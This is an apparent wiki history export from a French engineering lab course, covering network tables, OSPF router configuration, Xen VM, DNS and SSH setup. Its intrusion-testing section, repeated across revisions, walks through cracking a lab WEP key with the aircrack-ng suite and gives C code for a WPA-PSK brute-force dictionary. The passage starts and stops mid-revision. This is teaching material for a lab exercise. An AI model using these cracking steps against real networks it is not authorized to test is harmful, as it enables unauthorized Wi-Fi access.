| 45&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| morillon.website&lt;br /&gt;
| 306&lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 10.60.106.1&lt;br /&gt;
| 10.60.106.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.106.254&lt;br /&gt;
| 2001:660:4401:60b8::0/64&lt;br /&gt;
| 46&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
| girolle.site&lt;br /&gt;
| 307&lt;br /&gt;
| 10.60.107.0/24&lt;br /&gt;
| 10.60.107.1&lt;br /&gt;
| 10.60.107.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.107.254&lt;br /&gt;
| 2001:660:4401:60b9::0/64&lt;br /&gt;
| 47&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
| piedbleu.site&lt;br /&gt;
| 308&lt;br /&gt;
| 10.60.108.0/24&lt;br /&gt;
| 10.60.108.1&lt;br /&gt;
| 10.60.108.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.108.254&lt;br /&gt;
| 2001:660:4401:60ba::0/64&lt;br /&gt;
| 48&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
| calicedelamort.site&lt;br /&gt;
| 309&lt;br /&gt;
| 10.60.109.0/24&lt;br /&gt;
| 10.60.109.1&lt;br /&gt;
| 10.60.109.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.109.254&lt;br /&gt;
| 2001:660:4401:60bb::0/64&lt;br /&gt;
| 49&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
| pleurote.site&lt;br /&gt;
| 310&lt;br /&gt;
| 10.60.110.0/24&lt;br /&gt;
| 10.60.110.1&lt;br /&gt;
| 10.60.110.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.110.254&lt;br /&gt;
| 2001:660:4401:60bc::0/64&lt;br /&gt;
| 50&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
| 51&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| truffe.site&lt;br /&gt;
| 312&lt;br /&gt;
| 10.60.112.0/24&lt;br /&gt;
| 10.60.112.1&lt;br /&gt;
| 10.60.112.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.112.254&lt;br /&gt;
| 2001:660:4401:60be::0/64&lt;br /&gt;
| 52&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| 314&lt;br /&gt;
| 10.60.114.0/24&lt;br /&gt;
| 10.60.114.1&lt;br /&gt;
| 10.60.114.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.114.254&lt;br /&gt;
| 2001:660:4401:60bf::0/64&lt;br /&gt;
| 54&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation du réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Branchement du matériel ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]&lt;br /&gt;
&lt;br /&gt;
=== Connexions entre équipements ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te1/1/1&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/5&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Ge0/0/2&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/5&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.1/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Eth5&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/4&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.12/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 1G&lt;br /&gt;
| Te1/1/3&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.2/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Eth4&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Ge0/0/0&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Gi1/0/1&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.13/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
| 531&lt;br /&gt;
| 213.215.6.102&lt;br /&gt;
|-&lt;br /&gt;
| SDSL&lt;br /&gt;
| Cuivre&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage de l'OSPF ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
  router-id 10.60.100.2                                   # on change simplement l'id du routeur par rapport au 6509-E&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
  redistribute connected subnets                       &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53754</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53754"/>
				<updated>2020-11-16T16:23:52Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53096</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53096"/>
				<updated>2020-11-02T17:30:32Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Chiffrement de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0&lt;br /&gt;
3. enable&lt;br /&gt;
4. conf t&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
6. exit&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
accès ssh ok (modif /etc/ssh/sshd_config)&lt;br /&gt;
&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @	IN	SOA	ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
 			      6		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.clavaire.site.&lt;br /&gt;
 ns1	IN	A	193.48.57.186&lt;br /&gt;
 www	IN	A       193.48.57.186	&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
